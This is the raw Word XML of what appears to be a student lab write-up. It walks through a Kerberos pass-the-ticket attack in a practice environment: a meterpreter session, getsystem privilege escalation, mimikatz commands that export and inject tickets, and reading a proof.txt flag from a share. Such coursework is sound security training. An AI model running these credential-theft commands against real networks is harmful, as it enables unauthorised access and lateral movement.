          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="026A618A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4A6D0793" w14:textId="4DDB9671" w:rsidR="00A440A4" w:rsidRDefault="00A440A4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C274503" wp14:editId="4C185870">
            <wp:extent cx="8229600" cy="3793490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1471889512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89512" name="Picture 30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CDA0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11E7B9F1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64C8070A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5269D1B5" w14:textId="77777777" w:rsidR="00A440A4" w:rsidRDefault="00A440A4" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440A4">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an administrator on target machine to start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> session. Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A440A4">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elevate privileges to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A440A4">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE4112A" w14:textId="77777777" w:rsidR="00A440A4" w:rsidRDefault="00A440A4" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16CB1EA3" w14:textId="77777777" w:rsidR="00A440A4" w:rsidRDefault="00A440A4" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BBD70DA" w14:textId="44734FD9" w:rsidR="00A440A4" w:rsidRDefault="00A440A4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24F6FA19" wp14:editId="35728322">
            <wp:extent cx="8229600" cy="3218815"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1053333962" name="Picture 3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33962" name="Picture 31" descr="A computer screen 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F802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166B7AF5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4F655CC3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0A3D4CA0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6786F472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5E6FEBF0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5872F417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3956ECB2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1C5F5A97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07FBB973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0C054821" w14:textId="77777777" w:rsidR="00A440A4" w:rsidRDefault="00A440A4" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61BC2388" w14:textId="0C0D019B" w:rsidR="00A440A4" w:rsidRDefault="00A440A4" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440A4">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Drop on a shell in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> session using ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00A440A4">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>shell’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> and locate mimikatz.exe at </w:t>
      </w:r>
      <w:r w:rsidRPr="00A440A4">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>C:\Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1945219D" w14:textId="77777777" w:rsidR="002F0268" w:rsidRDefault="002F0268" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D6DF42" w14:textId="77777777" w:rsidR="002F0268" w:rsidRDefault="002F0268" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FD0F97" w14:textId="5C7D5C40" w:rsidR="00A440A4" w:rsidRDefault="00A440A4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5048DFC9" wp14:editId="7DD76A5C">
            <wp:extent cx="8229600" cy="3855720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="152974719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47192" name="Picture 32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1058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137CE62D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73A153A3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54EED48C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2CDA9B35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4407739D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1393B77E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1ACC040C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33DC2601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72B6209A" w14:textId="06E83A39" w:rsidR="006A3EA2" w:rsidRDefault="006A3EA2" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A3EA2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3EA2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Check if client76 has access to web04 shared folder. (</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3EA2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The result is: Access denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34585A82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39546A58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3B69826B" w14:textId="5C1D9B3C" w:rsidR="006A3EA2" w:rsidRDefault="006A3EA2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6D923EF" wp14:editId="789055F0">
            <wp:extent cx="6153466" cy="2368672"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="204739783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9783" name="Picture 40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2AD8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23485DEC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239643C1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06D1B390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458831F8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1C50ADD8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09D94F92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367D4EE6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7DFA22FB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7245B15B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1F19AB6A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296BD2F1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099B608B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53EEEE9B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341DBB51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0BF1C073" w14:textId="77777777" w:rsidR="006A3EA2" w:rsidRDefault="006A3EA2" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265C830D" w14:textId="77777777" w:rsidR="007F591F" w:rsidRDefault="007F591F" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C223A10" w14:textId="355D5E18" w:rsidR="007F591F" w:rsidRDefault="007F591F" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5435E03A" w14:textId="29C479DB" w:rsidR="009B2C21" w:rsidRDefault="009B2C21" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50B0A">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50B0A">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target machine to export TGT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CE5E7A" w14:textId="77777777" w:rsidR="009B2C21" w:rsidRDefault="009B2C21" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD7898C" w14:textId="1F0DA16C" w:rsidR="009B2C21" w:rsidRPr="009B2C21" w:rsidRDefault="009B2C21" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B2C21">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>./mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5277301C" w14:textId="1EADD70A" w:rsidR="009B2C21" w:rsidRPr="009B2C21" w:rsidRDefault="009B2C21" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2C21">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t>privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6479DD85" w14:textId="4E45BF9C" w:rsidR="009B2C21" w:rsidRPr="009B2C21" w:rsidRDefault="009B2C21" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B2C21">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:tab/>
        <w:t>sekurlsa::tickets /export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4D8EBA" w14:textId="77777777" w:rsidR="009B2C21" w:rsidRDefault="009B2C21" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F924C5" w14:textId="6CCDC010" w:rsidR="009B2C21" w:rsidRDefault="009B2C21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2C4E2438" wp14:editId="584583A0">
            <wp:extent cx="8229600" cy="3803015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1136942870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42870" name="Picture 36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0CA7" w14:textId="77777777" w:rsidR="00C852CC" w:rsidRDefault="00C852CC" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FB67A4" w14:textId="77777777" w:rsidR="00C852CC" w:rsidRDefault="00C852CC" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAB4305" w14:textId="77777777" w:rsidR="00C852CC" w:rsidRDefault="00C852CC" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010AA61A" w14:textId="77777777" w:rsidR="00C852CC" w:rsidRDefault="00C852CC" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8C8A99" w14:textId="77777777" w:rsidR="00C852CC" w:rsidRDefault="00C852CC" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034965CB" w14:textId="77777777" w:rsidR="00C852CC" w:rsidRDefault="00C852CC" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E461AFE" w14:textId="4C0F9CFE" w:rsidR="00C852CC" w:rsidRDefault="006A3EA2" w:rsidP="006A3EA2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A3EA2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3EA2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">As many tickets have been generated, we can just pick any TGS ticket in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>dave@cifs-web04.kirbi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> format and inject it through      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> via the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command. This </w:t>
      </w:r>
      <w:r w:rsidR="00465497">
        <w:t xml:space="preserve">grants access to web04 shared folder which has </w:t>
      </w:r>
      <w:r w:rsidR="00465497" w:rsidRPr="00465497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proof.txt</w:t>
      </w:r>
      <w:r w:rsidR="00465497">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB5E62C" w14:textId="77777777" w:rsidR="00C852CC" w:rsidRDefault="00C852CC" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD5A57D" w14:textId="73577849" w:rsidR="00C852CC" w:rsidRDefault="00C852CC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DAE7D54" wp14:editId="460210A6">
            <wp:extent cx="8229600" cy="3798570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1451487216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87216" name="Picture 37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D393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00F83EA8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5F30B929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020948E9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366BFA25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254B6940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110B754D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2E5173D7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73FCBB1B" w14:textId="17CE24CD" w:rsidR="00E45D8F" w:rsidRDefault="00E45D8F" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B158C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 10:</w:t>
      </w:r>
      <w:r w:rsidRPr="005B158C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Use ‘type </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidRPr="005777D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Calibri"/>
          </w:rPr>
          <w:t>\\web04\backup\proof.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>’ to get the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D79F7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235F4108" w14:textId="77777777" w:rsidR="00E45D8F" w:rsidRDefault="00E45D8F" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17CDEFDF" w14:textId="5E80B9B1" w:rsidR="00E45D8F" w:rsidRPr="005464F3" w:rsidRDefault="00E45D8F" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing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0B60AEB2" wp14:editId="1B87DBA5">
            <wp:extent cx="8229600" cy="3803015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="133640612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612" name="Picture 4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D8F" w:rsidRPr="005464F3">
      <w:headerReference w:type="default" r:id="rId46"/>
      <w:footerReference w:type="default" r:id="rId4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283E" w14:textId="77777777" w:rsidR="0006674C" w:rsidRDefault="0006674C" w:rsidP="003C1D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="05B25A52" w14:textId="77777777" w:rsidR="0006674C" w:rsidRDefault="0006674C" w:rsidP="003C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48D0" w14:textId="18A7DB21" w:rsidR="003C1D22" w:rsidRPr="003C1D22" w:rsidRDefault="00B24B07">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
      <w:t>Ashish Hedau</w:t>
    </w:r>
    <w:r w:rsidR="003C1D22">
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
      <w:t xml:space="preserve">, </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-CA"/>
      </w:rPr>
      <w:t>219911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AA96" w14:textId="77777777" w:rsidR="0006674C" w:rsidRDefault="0006674C" w:rsidP="003C1D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F7FFC67" w14:textId="77777777" w:rsidR="0006674C" w:rsidRDefault="0006674C" w:rsidP="003C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5B0499" w14:paraId="00169DB3" w14:textId="77777777" w:rsidTr="6A5B0499">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="17A7A332" w14:textId="352A5245" w:rsidR="6A5B0499" w:rsidRDefault="6A5B0499" w:rsidP="6A5B0499">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="2977D864" w14:textId="2AA4425C" w:rsidR="6A5B0499" w:rsidRDefault="6A5B0499" w:rsidP="6A5B0499">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="6FB2B335" w14:textId="1ACCBA55" w:rsidR="6A5B0499" w:rsidRDefault="6A5B0499" w:rsidP="6A5B0499">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="3D78B9E2" w14:textId="55608C7F" w:rsidR="6A5B0499" w:rsidRDefault="6A5B0499" w:rsidP="6A5B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2F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="055CD800"/>
    <w:lvl w:ilvl="0" w:tplc="1728A0AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2EAAA406">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F4445E54">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="18CCB12C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="93B4CD18">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BA561914">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9776F39E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A3A45D52">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A874F5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C590"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D33A0F6E"/>
